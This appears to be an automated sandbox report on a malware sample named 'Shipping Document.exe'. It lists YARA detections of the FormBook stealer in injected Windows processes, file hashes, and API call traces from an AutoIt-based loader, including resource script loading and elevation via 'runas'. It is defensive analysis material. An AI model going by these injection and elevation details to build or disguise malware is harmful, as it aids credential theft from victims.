May 27, 2024 12:23:43.841264963 CEST	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 27 May 2024 10:23:43 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Target ID:	1
Start time:	06:19:37
Start date:	27/05/2024
Path:	C:\Users\user\Desktop\Shipping Document.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Shipping Document.exe"
Imagebase:	0xfc0000
File size:	1'153'024 bytes
MD5 hash:	D6E393603C46C4152EA7603FF047AF86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:19:38
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Shipping Document.exe"
Imagebase:	0x6a0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:19:45
Start date:	27/05/2024
Path:	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe"
Imagebase:	0x100000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	06:19:46
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\certreq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\certreq.exe"
Imagebase:	0xb60000
File size:	439'296 bytes
MD5 hash:	A18A70A77AAC4E9D59CFD65C969AF959
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	06:20:01
Start date:	27/05/2024
Path:	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe"
Imagebase:	0x100000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	06:20:14
Start date:	27/05/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	2.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	138

Executed Functions

Function 00FC3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FC3B7A
IsDebuggerPresent.KERNEL32 ref: 00FC3B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,010862F8,010862E0,?,?), ref: 00FC3BFD

Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66

Part of subcall function 00FD0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00FC3C26,010862F8,?,?,?), ref: 00FD0ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 00FC3C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,010793F0,00000010), ref: 00FFD4BC
SetCurrentDirectoryW.KERNEL32(?,010862F8,?,?,?), ref: 00FFD4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01075D40,010862F8,?,?,?), ref: 00FFD57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00FFD581

Part of subcall function 00FC3A58: GetSysColorBrush.USER32(0000000F), ref: 00FC3A62
Part of subcall function 00FC3A58: LoadCursorW.USER32(00000000,00007F00), ref: 00FC3A71
Part of subcall function 00FC3A58: LoadIconW.USER32(00000063), ref: 00FC3A88
Part of subcall function 00FC3A58: LoadIconW.USER32(000000A4), ref: 00FC3A9A
Part of subcall function 00FC3A58: LoadIconW.USER32(000000A2), ref: 00FC3AAC
Part of subcall function 00FC3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FC3AD2
Part of subcall function 00FC3A58: RegisterClassExW.USER32(?), ref: 00FC3B28

Part of subcall function 00FC39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FC3A15
Part of subcall function 00FC39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FC3A36
Part of subcall function 00FC39E7: ShowWindow.USER32(00000000,?,?), ref: 00FC3A4A
Part of subcall function 00FC39E7: ShowWindow.USER32(00000000,?,?), ref: 00FC3A53

Part of subcall function 00FC43DB: _memset.LIBCMT ref: 00FC4401
Part of subcall function 00FC43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FC44A6

Strings

runas, xrefs: 00FFD575
This is a third-party compiled AutoIt script., xrefs: 00FFD4B4

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 0ed03059059fac33b4e593818302c1cf2af566627f5acb9653029af85070a276
Instruction ID: bc157560dc4d123a0d0a8fd6b19aeb3fc07a287762ce6852034977e1933a8623
Opcode Fuzzy Hash: 0ed03059059fac33b4e593818302c1cf2af566627f5acb9653029af85070a276
Instruction Fuzzy Hash: FF510331D0824AAACB21FBB4DE46FFD7B75AF04350F0480ADF8D1A6152CA3E5645EB20

Function 00FC4AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00FC4B2B

Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66

GetCurrentProcess.KERNEL32(?,0104FAEC,00000000,00000000,?), ref: 00FC4BF8
IsWow64Process.KERNEL32(00000000), ref: 00FC4BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00FC4C45
FreeLibrary.KERNEL32(00000000), ref: 00FC4C50
GetSystemInfo.KERNEL32(00000000), ref: 00FC4C81
GetSystemInfo.KERNEL32(00000000), ref: 00FC4C8D

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: a65a3b13a3dbbaab7824930e92f236dfbb8606c474916286577876200463027e
Instruction ID: bf6889d59080bda2aa1f81334a1a8f983f71157eb3dc3eeba0aa663616d95f32
Opcode Fuzzy Hash: a65a3b13a3dbbaab7824930e92f236dfbb8606c474916286577876200463027e
Instruction Fuzzy Hash: 2591273184A7C5DEC731DB788662BAAFFE5AF66310B044D9DD0CB83A51C224F908E719

Function 00FC4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00FC4EEE,?,?,00000000,00000000), ref: 00FC4FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FC4EEE,?,?,00000000,00000000), ref: 00FC5010
LoadResource.KERNEL32(?,00000000,?,?,00FC4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00FC4F8F), ref: 00FFDD60
SizeofResource.KERNEL32(?,00000000,?,?,00FC4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00FC4F8F), ref: 00FFDD75
LockResource.KERNEL32(00FC4EEE,?,?,00FC4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00FC4F8F,00000000), ref: 00FFDD88

Strings

SCRIPT, xrefs: 00FC5006

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 6779b655990172ff1f2f1e9a98cd23781cfb98c4692745edf319806a189221e0
Instruction ID: 453c4b1d4e3757597a0bd7a9ba6dd2ce37bf8838bf497287b15bdac9ce4476a7
Opcode Fuzzy Hash: 6779b655990172ff1f2f1e9a98cd23781cfb98c4692745edf319806a189221e0
Instruction Fuzzy Hash: C6119EB5640702BFD7308B29DE89F277BB9EBC9B51F10416CF445C6250DB62E8409660

Function 01024696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00FFE7C1), ref: 010246A6
FindFirstFileW.KERNELBASE(?,?), ref: 010246B7
FindClose.KERNEL32(00000000), ref: 010246C7

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 98f695f24a7162bf5592fda5b50f996975b82b070988eab912f594d882d43c4c
Instruction ID: 37b3ec92f0c7a9fb64fec5ccdcdbfaab8485a39dea77a20cd78a3c3be65af292
Opcode Fuzzy Hash: 98f695f24a7162bf5592fda5b50f996975b82b070988eab912f594d882d43c4c
Instruction Fuzzy Hash: 16E0D875910411DB4231663CED8D4EA779C9E09235F000746F9B5C10D0EBB459508696

Function 00FCE800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 0100428C

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 467f14efbf92e41d8071beedd7e1f1721ce2e6721018a57720e34c9240f8d2e2
Instruction ID: 5297ed4cb34d90b38388de7a2cd839747039477521cac9ddf7be36d49587ccc5
Opcode Fuzzy Hash: 467f14efbf92e41d8071beedd7e1f1721ce2e6721018a57720e34c9240f8d2e2
Instruction Fuzzy Hash: D4A27A75E00206CFDB24CF58C682FADB7B2BB48310F24806DE956AB355D735AC46EB91

Function 00FD0B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD0BBB
timeGetTime.WINMM ref: 00FD0E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD0FB3
TranslateMessage.USER32(?), ref: 00FD0FC7
DispatchMessageW.USER32(?), ref: 00FD0FD5
Sleep.KERNEL32(0000000A), ref: 00FD0FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 00FD105A
DestroyWindow.USER32 ref: 00FD1066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FD1080
Sleep.KERNEL32(0000000A,?,?), ref: 010052AD
TranslateMessage.USER32(?), ref: 0100608A
DispatchMessageW.USER32(?), ref: 01006098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 010060AC

Strings

@TRAY_ID, xrefs: 01005BB9
@COM_EVENTOBJ, xrefs: 0100591A
@GUI_WINHANDLE, xrefs: 010053B9
@GUI_CTRLID, xrefs: 01005364
@GUI_CTRLHANDLE, xrefs: 0100540E

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4003667617-3242690629
Opcode ID: 190871ea8fe5f6b621699f143824d00d82be28f5416dcbf57537e23949820efd
Instruction ID: 8b04431ff4398230f04665b2b3875a3a2e1a2cdb1515d251b7b6e5a7ada5dd0a
Opcode Fuzzy Hash: 190871ea8fe5f6b621699f143824d00d82be28f5416dcbf57537e23949820efd
Instruction Fuzzy Hash: 61B2B070608342DFE725DB24C885BAEBBE5BF84304F18495EE5C987291DB79E844DF82

Function 010293DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 010291E9: __time64.LIBCMT ref: 010291F3

Part of subcall function 00FC5045: _fseek.LIBCMT ref: 00FC505D

__wsplitpath.LIBCMT ref: 010294BE

Part of subcall function 00FE432E: __wsplitpath_helper.LIBCMT ref: 00FE436E

_wcscpy.LIBCMT ref: 010294D1
_wcscat.LIBCMT ref: 010294E4
__wsplitpath.LIBCMT ref: 01029509
_wcscat.LIBCMT ref: 0102951F
_wcscat.LIBCMT ref: 01029532

Part of subcall function 0102922F: _memmove.LIBCMT ref: 01029268
Part of subcall function 0102922F: _memmove.LIBCMT ref: 01029277

_wcscmp.LIBCMT ref: 01029479

Part of subcall function 010299BE: _wcscmp.LIBCMT ref: 01029AAE
Part of subcall function 010299BE: _wcscmp.LIBCMT ref: 01029AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 010296DC
_wcsncpy.LIBCMT ref: 0102974F
DeleteFileW.KERNEL32(?,?), ref: 01029785
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0102979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 010297AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 010297BE

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: f32fc087fca53760cdc42979dfc2716ed81c835a421eeba86b638767bf522c5d
Instruction ID: b8e90ea47ff0496a2bf5425723b75d4fc1dc49c3c4f714dde03f48f4eca41ad6
Opcode Fuzzy Hash: f32fc087fca53760cdc42979dfc2716ed81c835a421eeba86b638767bf522c5d
Instruction Fuzzy Hash: 2AC15DB1E0022AABCF21DF95CD85EDEB7BCEF44304F0040AAE649E7141DB359A848F65

Function 00FC3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00FC3074
RegisterClassExW.USER32(00000030), ref: 00FC309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FC30AF
InitCommonControlsEx.COMCTL32(?), ref: 00FC30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FC30DC
LoadIconW.USER32(000000A9), ref: 00FC30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FC3101

Strings

+, xrefs: 00FC305D
0, xrefs: 00FC3056
AutoIt v3 GUI, xrefs: 00FC3090
TaskbarCreated, xrefs: 00FC30A4

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 8a27e20540b7131c8287b2abc19cace4abe5b7bd4df7980aab1279f42a57b817
Instruction ID: 695f17142e0a1e6b64fc7be33f82380ae43c24dd97ade277a3552591a2e83e0a
Opcode Fuzzy Hash: 8a27e20540b7131c8287b2abc19cace4abe5b7bd4df7980aab1279f42a57b817
Instruction Fuzzy Hash: 4E3147B585430AEFDB20DFA8D989ACDBBF0FB09310F15426AE5D0E6284D3BA4585CF51

Function 00FC3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00FC3074
RegisterClassExW.USER32(00000030), ref: 00FC309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FC30AF
InitCommonControlsEx.COMCTL32(?), ref: 00FC30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FC30DC
LoadIconW.USER32(000000A9), ref: 00FC30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FC3101

Strings

+, xrefs: 00FC305D
0, xrefs: 00FC3056
AutoIt v3 GUI, xrefs: 00FC3090
TaskbarCreated, xrefs: 00FC30A4

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: b285edccb5b4f0d2f341bfa5233c8fc22144fa6698f60ced5f9272cefc06cadf
Instruction ID: 6d8b39a90248ac08144463e153dd49d5553cc1a1e3346973c19726ff9e3a23f2
Opcode Fuzzy Hash: b285edccb5b4f0d2f341bfa5233c8fc22144fa6698f60ced5f9272cefc06cadf
Instruction Fuzzy Hash: 3E2115F5914209EFDB20DFA8E988B8DBBF4FB08700F00421AF994E6284D7BB05448F91

Function 00FC71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FC4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010862F8,?,00FC37C0,?), ref: 00FC4882

Part of subcall function 00FE074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00FC72C5), ref: 00FE0771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FC7308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FFECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FFED32
RegCloseKey.ADVAPI32(?), ref: 00FFED70
_wcscat.LIBCMT ref: 00FFEDC9

Strings

Software\AutoIt v3\AutoIt, xrefs: 00FC72FE
\Include\, xrefs: 00FC72C5
Include, xrefs: 00FFECE8, 00FFED29
\, xrefs: 00FFEDEC

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
